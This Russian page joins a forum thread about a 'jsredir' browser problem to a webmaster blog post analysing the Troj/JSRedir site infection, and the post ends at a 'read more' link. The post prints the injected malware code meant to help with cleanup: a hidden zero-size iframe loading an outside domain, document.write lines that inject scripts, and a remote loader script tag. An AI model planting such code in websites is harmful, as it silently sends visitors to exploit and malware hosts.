Jsredir что это и как вылечить
17.09.16 23:29 (ответ для: Liza2791)
Liza2791 писал(а): Т.е. после установки лицензионной системы и лицензионного Каспера при первом пользовании у вас появилась та же проблема? Или вы что-то опять закачали на комп и ё.. роутер, он во всем виноват? Если всё так, как вы написали – только переустановили систему и сразу проявился вирус, обратитесь к вашему провайдеру. Я очень хорошо осведомлена в таких вопросах, ибо сама работаю в тех.поддержке одного из провайдеров
да ничего не закачивала, в том то и дело. заново устоновленная лицензионная версия ОС, Касперский(который никаких вирусов не обнаружил), вход в инет и опять всё по новой. только после перепрошивки, чистки и последующей настройки роутера(после сброса до заводских настроек) проблема исчезла. на данный момент всё чисто. просто вы сказали, что что грешить на роутер глупо, а дело то оказалось в нём. потому я и сказала – не делайте поспешных выводов.
16.09.16 20:12 (ответ для: SheRma)
SheRma писал(а): да нет никаких вирусовкроме того, о котором я написала. даже Касперский подтвердилесть лицензионка. я никакую заразную хрень не загружаю, с чего вы это взяли вообще? после полной переустановки ОС в верхней строке httpя ещё только на стартовую страничку яндекс захожу СРАЗУ появляется строка с jsredir. точно также и на двух других ноутбукахродители толком интернетом пользоваться не умеют, поэтому вообще ничего не загружают, а я к их ноутбукам даже не подхожу. прежде чем делать выводы, убедитесь в том, что вы осведомлены обо всём на все 100.
Т.е. после установки лицензионной системы и лицензионного Каспера при первом пользовании у вас появилась та же проблема? Или вы что-то опять закачали на комп и “ё.. роутер, он во всем виноват“? Если всё так, как вы написали – только переустановили систему и сразу проявился вирус, обратитесь к вашему провайдеру.
Я очень хорошо осведомлена в таких вопросах, ибо сама работаю в тех.поддержке одного из провайдеров
14.09.16 11:52 (ответ для: Liza2791)
да нет никаких вирусов(кроме того, о котором я написала). даже Касперский подтвердил(есть лицензионка).
я никакую заразную хрень не загружаю, с чего вы это взяли вообще?
после полной переустановки ОС в верхней строке http(я ещё только на стартовую страничку яндекс захожу) СРАЗУ появляется строка с jsredir.
точно также и на двух других ноутбуках(родители толком интернетом пользоваться не умеют, поэтому вообще ничего не загружают, а я к их ноутбукам даже не подхожу).
прежде чем делать выводы, убедитесь в том, что вы осведомлены обо всём на все 100.
Переустановка системы не помогла??? или переустановка чего? У вас вирусы гуляют, как в осеннем парке, но вы всё загружаете и загружаете всякую заразную хрень. Я даже не удивлена, что такие проблемы у вас с компьютером.
Вы думаете, что через роутер заразили все устройства? Вы настолько бездумно используете интернет и технику, что грешить на роутер глупо.
Обратитесь к специалисту, который почистит все ваши устройства и установит надежный антивирус, еще рекомендую вам установить Unchecky, который будет блокировать ненужные приложения, программы и снимать лишние галочки при установке новой программы на ваш компьютер, так как поняла, что вы любите всякий мусор устанавливать – отсюда и проблемы. Антивирус, в вашем случае, Касперский и ЛИЦЕНЗИОННЫЙ, а не, как вы привыкли – скачанный и установленный не бог весть откуда.
На вашем несчастном компьютере даже восстановление системы делать бессмысленно, ибо вы всегда им так неграмотно пользовались и точек восстановления чистых не найти на нем. Только переустановка системы.
11.09.16 15:20 (ответ для: ИзольдаФранцевна)
purr-kiri писал(а): надеюсь вы скоро найдете специалиста
только на это и надеюсь. спасибо)
11.09.16 15:19 (ответ для: SheRma)
SheRma писал(а): всё делала. и касперским и в безопасном. там уже системные файлы повреждены. вот только почему то переустановка ОС не помогла. всё равно гад возвращается. там в верхней строке, перед тем как зайти на любой сайт, отображается вот это jsredir и куча каких то значков и цифр после него.
жаль конечно, даже на запущенном компе родителей помогло(
странно, что после полной переустановки системы нет результата, все ж удаляется и заново устанавливается
действительно уже нужно предметно смотреть, раз общие рецепты не помогают
надеюсь вы скоро найдете специалиста
11.09.16 14:53 (ответ для: ИзольдаФранцевна)
purr-kiri писал(а): a вы можете скрин или ножницами изображение добавить?
всё делала. и касперским и в безопасном. там уже системные файлы повреждены. вот только почему то переустановка ОС не помогла. всё равно гад возвращается.
там в верхней строке, перед тем как зайти на любой сайт, отображается вот это jsredir и куча каких то значков и цифр после него.
торможу
3. и в безопасном режиме запустить ту программу
11.09.16 14:26 (ответ для: SheRma)
спросила мужа, он посоветовал
1. скачать Kaspersky Virus Removal Tool (он бесплатный)
2. установить
3. запустить компьютер в безопасном (!) режиме
должно помочь
11.09.16 14:13 (ответ для: SheRma)
a вы можете скрин или ножницами изображение добавить?
11.09.16 11:24 (ответ для: ИзольдаФранцевна)
делала. через время этой “чужой“ опять возвращается. мастеров приходило человек 10, если не больше(за этот год). один только предположил, что нужно обратиться к поставщикам услуг(провайдеру). пусть они разруливают ситуацию, потому что такое ощущение, что это что-то запущенное с их подачи, потому что почищено всё, что только можно и на вредоносные сайты я ни ногой(хотя девушка ниже предположила, что причина в этом).
Источник
Всем привет!
Это первый пост, который я пишу в Новом году. Уже почти прошли все новогодние праздники (ну, за исключением разве что Старого-Нового года) и уже можно снимать новогодние украшения с блога. Хотя это, как говорится, на любителя, вон некоторые только новогоднюю ёлку умудряются в марте выкидывают.
Но это дело вкуса, а сейчас я расскажу о том, как бороться с вирусами на сайте, в частности с такими его разновидностями как, например, Troj/JSRedir-LR по классификации антивирусной компании Sophos. Если Вы ещё не ничего не слышали про компанию Софос, и думаете, что это какой-то очередной новичок на рынке антивирусного ПО, то глубоко ошибаетесь. Они на рынке уже довольно продолжительный период времени — около 15 лет и именно их антивирусные базы использует компания «Яндекс» для сканирования страниц в сети Интернет.
Из help-а Яндекса:
«Как Яндекс узнал о заражении?
Яндекс проверяет страницы сайтов из поискового индекса. Для определения, присутствует ли на странице вредоносный код, используется технология нашего партнера компании Sophos».
А начинается всё с того, что Яндекс начинает выкидывать страницы вашего сайта из индекса, хотя с точки зрения СЕО вы делали и делаете всё абсолютно правильно. И дело тут даже не в том, что хостинг просто-напросто заблокировал поисковых ботов Яндекса, как создающих излишнюю нагрузку на хостинг, а далее вы получаете письмо приблизительно такого содержания:
«Здравствуйте!
По данным поиска Яндекса, на Вашем сайте [название сайта] есть страницы, которые могут представлять угрозу для компьютеров посетителей. Поэтому в результатах поиска Яндекса ссылки на эти страницы помечаются как потенциально опасные.
Подробная информация о заражении Вашего сайта размещена на странице https://yandex.ru/infected?url=[название сайта]&l10n=ru .
Пожалуйста, удалите вредоносный код со страниц сайта. И после следующей проверки Яндекс уберёт из результатов поиска пометку о потенциальной опасности на Вашем сайте. Дополнительную информацию о поиске и удалении вредоносного кода Вы найдёте на странице https://help.yandex.ru/webmaster/?id=1059440#1059448.
Кроме того, мы рекомендуем Вам проверить сайт на наличие уязвимостей, которые могли привести к появлению на его страницах опасного содержимого. Советуем установить обновления системы управления сайтом и изменить пароли доступа администратора.
Для получения дополнительных данных о нарушении безопасности [название сайта], в том числе списка инфицированных страниц, зарегистрируйте сайт в Яндекс.Вебмастере (https://webmaster.yandex.ru). Через этот сервис также можно запросить перепроверку сайта сразу после удаления вредоносного кода с его страниц.
С уважением,
Команда безопасного поиска Яндекса
——
Если это уведомление пришло к вам по ошибке, или Вы не хотите получать подобные сообщения на этот адрес по любой другой причине, перейдите по ссылке https://webmaster.yandex.ru/subscription.xml?action=unsubscribe&host= . Чтобы снова подписаться на рассылку — по ссылке https://webmaster.yandex.ru/subscription.xml?action=subscribe&host= .
Hi,
Some of the pages on your website may pose a threat to your visitor’s computer security. The number of potentially harmful pages is 2. You can view the details of our malware scan at https://yandex.com/infected?url=[название сайта]&l10n=en . To learn about how to find malicious code and delete it from your pages, please go to the help section https://help.yandex.com/webmaster/?id=1115235#1115243 of our free website management service Yandex.Webmaster https://webmaster.yandex.com/.
Yandex is one of the world’s leading search engines and a popular web portal (https://company.yandex.com/general_info/yandex_today.xml). We continually check all websites in our search index using our own antivirus suite which integrates the signature and the behavioral approaches to malware detection. Read more about our antivirus technology at https://company.yandex.com/technologies/antivirus_technology.xml.
This is an automated message to alert you about a problem detected on your website. This service free and does not require registration.
To receive additional information about your website, including the list of infected pages, or to request a check-up after the malicious code has been deleted, please register on our free website management service Yandex.Webmaster (https://webmaster.yandex.com).
Best regards,
Yandex Safe Search Team
If you are not the intended recipient of this message or if you do not wish to receive messages like this in the future, you can unsubscribe from our mailing list by clicking this link https://webmaster.yandex.com/subscription.xml?action=unsubscribe&host= . To subscribe to our mailing list again, click this link https://webmaster.yandex.com/subscription.xml?action=subscribe&host= .»
И вы понимаете, что над вашим кормильцем начинают сгущаться чёрные тучи. Что же делать в таком случае бедному вебмастеру, как избавиться от этой напасти в виде скриптовых редиректов, троянов и прочей напасти?
Последнее время я перелопатил множество форумов и собрал большое количество информации по этому вопросу и сейчас представлю всю эту информацию в хронологическом порядке, отбирая, на мой взгляд, самое нужное и полезное.
Итак, подобные сообщения начали появляться в сети в начале прошлого года, весной, а не летом, как многие думают, хотя основная масса взломов пришлась именно на июль-август минувшего года. Однако подобные взломы появляются до сих пор с завидной регулярностью, поэтому, думаю, все сведения из статьи будут актуальны и сейчас.
(Почему так получилось? Читайте дальше и всё поймёте).
Вебмастера начали получать письма, текст которых я привёл чуть выше. При общении с Платонами, то бишь службой технической поддержки компании «Яндекс», они получали следующие ответы:
«Ваш сайт содержит Troj/JSRedir-LR (по данным компании Sophos). При последней проверке Вашего сайта наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на (gettouch.biz, webservice1.net, getpdainfo.com и т. д.) при посещении сайта с мобильных устройств».
Соответственно на форумах как грибы после дождя стали появляться однотипные сообщения следующего содержания:
«Взломали сайт. В результатах поиска Яндекса мой сайт теперь с пометкой: Сайт может угрожать безопасности вашего компьютера или мобильного устройства», «Яндекс начал блокировать сайт. Обнаружил вирус Troj/JSRedir-LR, по данным компании Sophos. Не один антивирус его не находит, посторонней рекламы и баннеров нет. Подозрительного тоже ничего не находит», «Взломали сайт, что делать?» Итак, что же делать?
[original:seo-semki.ru]
Модификации вируса Troj/JSRedir-LR
Вот модификации вируса, наиболее часто поражающие сайты веб-мастеров в этот период времени: Troj/JSRedir-MH, Troj/JSRedir-MN, Troj/ExpJS-JU, Troj/JSRedir-DM.
А вообще количество подобных вирусов впечатляет:
«Troj/JSRedir-AK
Troj/JSRedir-AR
Troj/JSRedir-AU
Troj/JSRedir-AZ
Troj/JSRedir-BB
Troj/JSRedir-BD
Troj/JSRedir-BP
Troj/JSRedir-DC
Troj/JSRedir-DL
Troj/JSRedir-DO
Troj/JSRedir-DP
Troj/JSRedir-DT
Troj/JSRedir-DС
Troj/JSRedir-EF
Troj/JSRedir-FV
Troj/JSRedir-GS
Troj/JSRedir-GW
Troj/JsRedir-HA
Troj/JSRedir-HB
Troj/JSRedir-HZ
Troj/JSRedir-LH
Troj/JSRedir-LR
Troj/JSRedir-MH
Troj/JSRedir-MN
Troj/JSRedir-O
Troj/JSRedir-R
Troj/JSRedir-S»
Полный список всех подобных вирусов вы можете самостоятельно посмотреть на https://help.yandex.ru/webmaster/security/verdicts.xml.
Вот как описывают эти трояны в самой компании:
«Данный вердикт означает, что на странице присутствует обфусцированный JavaScript-код (имена переменных и функций могут отличаться для каждого конкретного скрипта). Особенностью данного заражения является то, что вредоносный код дописывается к одному из файлов, имеющих расширение .js на сайте. Чтобы удалить вредоносный код с сервера, воспользуйтесь нашими инструкциями. Пример вредоносного кода, по которому выносится вердикт:
Картинки кликабельны — кликайте для увеличения.
Чтобы удалить вредоносный код с сервера, воспользуйтесь нашими инструкциями».
Это описание вредоносного кода, по которому выносится вердикт Troj/JSRedir-LR, ссылка: https://help.yandex.ru/webmaster/security/verdicts.xml#h1128140.
А вот описание троянской программы Troj/JSRedir-MH:
«Данный вердикт означает, что на сайте присутствует вредоносный JavaScript-код, который загружает вредоносный swf-объект, производящий подгрузку эксплойтов посетителям сайта. Как правило, этот вредоносный код злоумышленники размещают в отдельном js-файле на взломанном сервере.
Чтобы удалить вредоносный код с сервера, воспользуйтесь нашими инструкциями.
Пример вредоносного кода, по которому выносится вердикт Troj/JSRedir-модификация».
Далее идет пример вредоносного кода.
Надо заметить, что осенью прошлого года я сам столкнулся с подобным вирусом, тогда на сайте wordpress «Яндекс» обнаружил вирус в плагине Flash Video Player. Плагин был включён, но не использовался.
В самый конец js-скрипта злоумышленники дописали такой код:
var ifOIgm0 = document.createElement(‘iframe’); ifOIgm0.name = ‘ifOIgm0’; ifOIgm0.src = ‘https://cartul.ooff.ru/’; ifOIgm0.style.width = ‘0px’; ifOIgm0.style.height = ‘0px’; window.onload = function() {if (document.cookie.indexOf(‘ifOIgm0=’) == -1) {document.cookie = ‘ifOIgm0=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT’; document.getElementsByTagName(‘body’)[0].appendChild(ifOIgm0);}}; |
Код мы почистили, и больше он не появлялся. На аккаунте были и другие сайты, но они оказались нетронутыми. Поэтому мы решили, что дело в самом плагине видеопроигрывателя, что злоумышленники просто нашли в нём какую-то уязвимость, которую с успехом использовали. Плагин просто-напросто отключили, так как он всё равно не использовался.
Кстати, на ачате я нашел такую инфу -https://forum.antichat.ru/showthread.php?t=342398, тема создана 16.07.12, из чего можно сделать вывод, что именно в то время хакер планировал использовать айфрейм подобным образом (помните, об этом я говорил в само начале?)
«Создать iframe посредством JavaScript
Есть простой код:
<iframe name=”iframe” src=”https://site.ru” style=”width: 640px; height: 800px;”></iframe>” |
Можно ли его в javascript’e представить (мне нужно для последующей обфускации) и будет ли этот фрейм работать только в пределах <head> </head>
Вариант ответа:
var iframe = document.createElement(‘iframe’); iframe.name = ‘iframe’; iframe.src = ‘https://site.ru’; iframe.style.width = ‘640px’; iframe.style.height = ‘800px’; window.onload = function() { document.getElementsByTagName(‘body’)[0].appendChild(iframe); }; |
Данный код, как вы видите, один в один! Только размеры фрейма указаны позже по 0 пикселей – «А чтоб никто не догадался».
Для справки: тег <iframe> позволяет создавать внутри страницы плавающий фрейм, способный загружать в заданную область любые другие данные. Айфрейм активно используется хакерами в самых разных целях – от загрузки вредоносного ПО до кражи пользовательских данных через XSS.
И вот ещё интересная вещь. В панели вебмастера https://webmaster.yandex.ru/site/errors.xml?host=19166368 мы видим следующие ошибки:
«Исключённые страницы > Ошибки на стороне сервера или сайта
HTTP-статус: Доступ к ресурсу запрещён (403)
Доступ к документу запрещен (получен код 403 Forbidden). На запрос страниц ваш сервер вернул роботу HTTP-код 403. Если вы намеренно ограничили доступ к этим страницам, то исправлять ничего не требуется.
Если данные страницы должны индексироваться, то по вопросу возникновения и устранения этой проблемы, пожалуйста, обратитесь к администратору вашего сайта или сервера.
Дату возникновения ошибки вы можете видеть напротив каждой исключенной страницы в графе «Последнее посещение». Если с момента последнего обращения робота страницы вновь стали доступными (возвращают HTTP-код-200), то они автоматически будут проиндексированы по мере обхода сайта, после чего появятся в поиске с обновлениями поисковых баз».
Ясное дело, что никто намеренно не ограничивал яндекс-роботу доступа к сайту, в robots.txt вообще не было никаких запретов. Но как только был удалён вредоносный код, то и количество ошибок упало в три раза. Скриншот:
Файлы и джаваскрипты, в которых наиболее часто встречался вредоносный код
Количество таких модулей по понятным причинам огромно, поэтому приведу лишь некоторые из них.
Итак, вирусный код поражал следующие файлы:
CMS Joomla (Джумла)
Модуль AutsonSlideShow — бесплатный модуль слайд шоу, работающий на основе библиотеки jQuery. Меняли файл default.php, находящийся в mod_AutsonSlideShow, папка tmpl.
Файлы:
/media/system/js.caption.js
/includes/js/tabs/mememe.js
/administrator/templates/bluestork/main.js
/components/com_virtuemart/assets/js/vmsite.js
/administrator/images/bookmarks.php
/administrator/images/nyla.swf
CMS WordPress (Вордпресс)
Вирус изменял или добавлял (как правило, флэш) следующие файлы:
/wp-includes/images/smilies/functions.js
/wp-includes/images/smilies/galata.js
/wp-includes/js/l10n.js
/wp-includes/js/comment-reply.js
/wp-content/plugins/flash-video-player/swfobject.js
/wp-content/themes/twentytwelve/js/navigation.js
/wp-content/plugins/auto-highslide/highslide/highslide-with-html.packed.js
/wp-includes/images/crystal/video.php
/wp-admin/js/set-post-thumbnail.dev.php
Flash-объекты:
/admin/media/images/forward_enabled.swf
/wp-includes/images/crystal/video.swf
/wp-includes/images/crystal/jomama.swf
melbourne.swf (как вариант, создавался дополнительный файл, который содержал в себе exploit.SWF.254).
CMS DLE (на примере ДЛЕ 10)
engine/classes/js/dle_js.js
/sites/default/files/images/mines.swf
/sites/default/files/blaine.js
/modules/comment/comment-wrapper.tpl1.php
Форумный движок vbulletin. Посторонний код добавлялся в файлы
yuiloader-dom-event.js
vbulletin-core.js
vbulletin_cms.js
index.php
content.php
Менялись также как родные скрипты движков, так и создавались новые, с произвольными именами:
/images/cheet.js
/js/jquery.js
/js/slide.js
functions.js
navigation.js
photos.js
vote.js
Если новые файлы создавались в папках с картинками (images), то они брали имена любых из этих изображений, например, gradient3a.php или no_avatar23.php.
[original:seо-sеmki.ru]
Примеры вставок в файлы, которые ввели на зараженные скрипты:
document.write(«<scr»+»ipt src=’/uploads/posts/2009-11/cloclo.js’><«+»/script>»);
document.write(«<scr»+»ipt src=’/administrator/templates/bluestork/main.js’><«+»/script>»);
document.write(«<scr»+»ipt src=’/adm/images/show_ads.js’><«+»/script>»);
document.write(«<scr»+»ipt src=’/wp-includes/images/smilies/functions.js’><«+»/script>»);
document.write(«<scr»+»ipt src=’/wp-includes/images/smilies/functions.js’><«+»/script>»);
document.write(«<scr»+»ipt src=’/admin/media/js/jquery.js’><«+»/script>»);
document.write(«<scr»+»ipt src=’/administrator/help/en-GB/blac.js’><«+»/script>»);
<script src=»//ad.nwindscore.net/ldr.php?194288529″></script>
Но вернёмся к началу. Количество взломанных сайтов росло, на соответствующих форумах создавались всё новые темы, но никто не мог дать ответа на конкретный вопрос: Как происходит заражение и почему обычные меры безопасности, принятые в таких случаях, не помогают?
Читать далее «Уязвимость крылась на хостинге»
Источник